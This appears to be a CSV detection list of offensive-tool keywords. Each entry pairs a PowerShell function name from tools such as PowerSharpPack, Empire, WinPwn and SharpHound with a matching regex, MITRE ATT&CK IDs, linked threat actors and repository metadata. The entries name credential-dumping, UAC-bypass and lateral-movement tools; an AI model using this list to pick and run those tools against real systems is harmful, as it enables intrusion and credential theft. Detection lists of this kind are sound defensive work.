"*Invoke-ShareHunter *",".{0,1000}Invoke\-ShareHunter\s.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","49563"
"*Invoke-ShareHunter.ps1*",".{0,1000}Invoke\-ShareHunter\.ps1.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","1","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","49564"
"*Invoke-SharpAllowedToAct*",".{0,1000}Invoke\-SharpAllowedToAct.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49565"
"*Invoke-SharpBlock*",".{0,1000}Invoke\-SharpBlock.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49566"
"*Invoke-SharpBypassUAC*",".{0,1000}Invoke\-SharpBypassUAC.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49567"
"*Invoke-SharpChiselClient*",".{0,1000}Invoke\-SharpChiselClient.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49568"
"*Invoke-SharpChiselClient.ps1*",".{0,1000}Invoke\-SharpChiselClient\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49569"
"*Invoke-SharpChromium*",".{0,1000}Invoke\-SharpChromium.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49570"
"*Invoke-SharpClipboard*",".{0,1000}Invoke\-SharpClipboard.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49571"
"*Invoke-SharpCloud*",".{0,1000}Invoke\-SharpCloud.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49572"
"*Invoke-SharpCloud*",".{0,1000}Invoke\-SharpCloud.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49573"
"*Invoke-Sharpcradle*",".{0,1000}Invoke\-Sharpcradle.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49574"
"*Invoke-SharpDPAPI*",".{0,1000}Invoke\-SharpDPAPI.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49575"
"*Invoke-SharpDump*",".{0,1000}Invoke\-SharpDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49576"
"*Invoke-SharPersist*",".{0,1000}Invoke\-SharPersist.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49577"
"*Invoke-SharpGPO*",".{0,1000}Invoke\-SharpGPO.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49578"
"*Invoke-SharpGPOAbuse*",".{0,1000}Invoke\-SharpGPOAbuse.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49579"
"*Invoke-SharpGPO-RemoteAccessPolicies*",".{0,1000}Invoke\-SharpGPO\-RemoteAccessPolicies.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49580"
"*Invoke-SharpHandler*",".{0,1000}Invoke\-SharpHandler.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49581"
"*Invoke-SharpHide*",".{0,1000}Invoke\-SharpHide.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49582"
"*InvokeSharpHound*",".{0,1000}InvokeSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","49583"
"*InvokeSharpHound*",".{0,1000}InvokeSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","49584"
"*Invoke-Sharphound*",".{0,1000}Invoke\-Sharphound.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49585"
"*Invoke-Sharphound2*",".{0,1000}Invoke\-Sharphound2.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49586"
"*Invoke-Sharphound3*",".{0,1000}Invoke\-Sharphound3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49587"
"*Invoke-SharpHound4*",".{0,1000}Invoke\-SharpHound4.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49588"
"*Invoke-Sharphound4*",".{0,1000}Invoke\-Sharphound4.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49589"
"*Invoke-SharpImpersonation*",".{0,1000}Invoke\-SharpImpersonation.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49590"
"*Invoke-SharpImpersonation*",".{0,1000}Invoke\-SharpImpersonation.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49591"
"*Invoke-SharpImpersonationNoSpace*",".{0,1000}Invoke\-SharpImpersonationNoSpace.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49592"
"*Invoke-SharpKatz*",".{0,1000}Invoke\-SharpKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49593"
"*Invoke-SharpLdapRelayScan*",".{0,1000}Invoke\-SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49594"
"*Invoke-SharpLdapRelayScan*",".{0,1000}Invoke\-SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49595"
"*Invoke-Sharplocker*",".{0,1000}Invoke\-Sharplocker.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49596"
"*Invoke-SharpLoginPrompt*",".{0,1000}Invoke\-SharpLoginPrompt.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49597"
"*Invoke-SharpLoginPrompt.ps1*",".{0,1000}Invoke\-SharpLoginPrompt\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49598"
"*Invoke-SharpMove*",".{0,1000}Invoke\-SharpMove.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49599"
"*Invoke-SharpPrinter*",".{0,1000}Invoke\-SharpPrinter.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49600"
"*Invoke-SharpPrinter*",".{0,1000}Invoke\-SharpPrinter.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49601"
"*Invoke-SharpPrintNightmare*",".{0,1000}Invoke\-SharpPrintNightmare.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49602"
"*Invoke-SharpRDP*",".{0,1000}Invoke\-SharpRDP.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49603"
"*Invoke-SharpRDP*",".{0,1000}Invoke\-SharpRDP.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49604"
"*Invoke-SharpRDP.ps1*",".{0,1000}Invoke\-SharpRDP\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49605"
"*Invoke-SharpRDPTest*",".{0,1000}Invoke\-SharpRDPTest.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49606"
"*Invoke-SharpSCCM*",".{0,1000}Invoke\-SharpSCCM.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49607"
"*Invoke-SharpSCCM*",".{0,1000}Invoke\-SharpSCCM.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49608"
"*Invoke-SharpSecDump *",".{0,1000}Invoke\-SharpSecDump\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49609"
"*Invoke-SharpSecDump*",".{0,1000}Invoke\-SharpSecDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49610"
"*Invoke-SharpSecDump.ps1*",".{0,1000}Invoke\-SharpSecDump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49611"
"*Invoke-Sharpshares*",".{0,1000}Invoke\-Sharpshares.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49612"
